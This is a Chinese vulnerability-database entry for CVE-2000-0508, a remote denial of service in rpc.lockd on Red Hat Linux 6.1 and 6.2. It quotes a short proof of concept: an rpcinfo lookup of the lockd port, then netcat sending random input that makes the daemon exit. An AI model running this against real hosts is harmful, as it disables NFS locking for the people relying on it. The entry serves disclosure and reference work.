Red Hat Linux服务拒绝漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105880 漏洞类型 未知
发布时间 2000-06-08 更新时间 2005-05-02
CVE编号 CVE-2000-0508 CNNVD-ID CNNVD-199412-001
漏洞平台 Linux CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/20025
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199412-001
|漏洞详情
RedHatLinux6.1和6.2版本中的rpc.lockd存在漏洞。远程攻击者可以通过恶意请求导致服务拒绝。
|漏洞EXP
source: http://www.securityfocus.com/bid/1372/info

A denial of service attack exists in the NFS lock daemon supplied with Linux. By connecting to the port rpc.lockd is running on, and supplying random input, it will cause lockd to exit with an error. The socket associated with rpc.lockd is also not properly released, and cannot be rebound to without a reboot.

This vulnerability most likely affects all Linux distributions running NFS. 

[root@hiro /]# rpcinfo -p target
program vers proto port
100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100021 1 udp 1024 nlockmgr
100021 3 udp 1024 nlockmgr
100021 1 tcp 1024 nlockmgr
100021 3 tcp 1024 nlockmgr
100024 1 udp 831 status
100024 1 tcp 833 status
[root@hiro /]# nc -p 1000 target 1024
alksdjfalskdjfsdafs
Here, I issued a Ctrl-C to get out of netcat, and got:
punt!
[root@hiro /]#
[root@hiro /]# rpcinfo -p target
program vers proto port
100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100024 1 udp 831 status
100024 1 tcp 833 status
[root@hiro /]#
|参考资料

来源:BID
名称:1372
链接:http://www.securityfocus.com/bid/1372
来源:BUGTRAQ
名称:20000608RemoteDOSinlinuxrpc.lockd
链接:http://archives.neohapsis.com/archives/bugtraq/2000-06/0073.html
来源:XF
名称:linux-lockd-remote-dos
链接:http://xforce.iss.net/static/5050.php